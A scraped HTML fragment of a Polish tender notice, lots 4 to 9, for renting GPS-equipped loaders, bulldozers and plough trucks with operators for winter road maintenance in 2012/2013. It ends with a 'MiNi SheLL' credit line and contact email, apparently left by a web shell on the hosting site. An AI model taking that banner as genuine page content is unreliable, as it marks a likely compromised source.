<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimum sprzętowe jakim powinien dysponować Wykonawca:
-samochód o ładowności min. 10T z pługiem szczytowym- 2 szt.
- samochód o ładowności min. 10T z pługiem bocznym- 2 szt.
- koparko-ładowarka o poj. łyżki od 1,0 -2,0  m3- 2 szt.
- koparko - ładowarka o pojemności łyżki powyżej  2,0 m3  - 1 szt
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wynajem koparko-ładowarki o poj. łyżki do 1,0 m3- 3 szt,
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wynajem koparko-ładowarki o poj. łyżki od 1,0 -2,0  m3- 3 szt,
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wynajem koparko - ładowarki o pojemności łyżki powyżej 2,0 m3  - 2 szt,
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wynajem spycharki (ciągnik gąsienicowy) do 100 KM - 1 szt,
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wynajem spycharki (ciągnik gąsienicowy) powyżej 100 KM - 1 szt
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wynajem koparko-ładowarki z pługiem szczytowym min. 5m szerokości - 1 szt
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com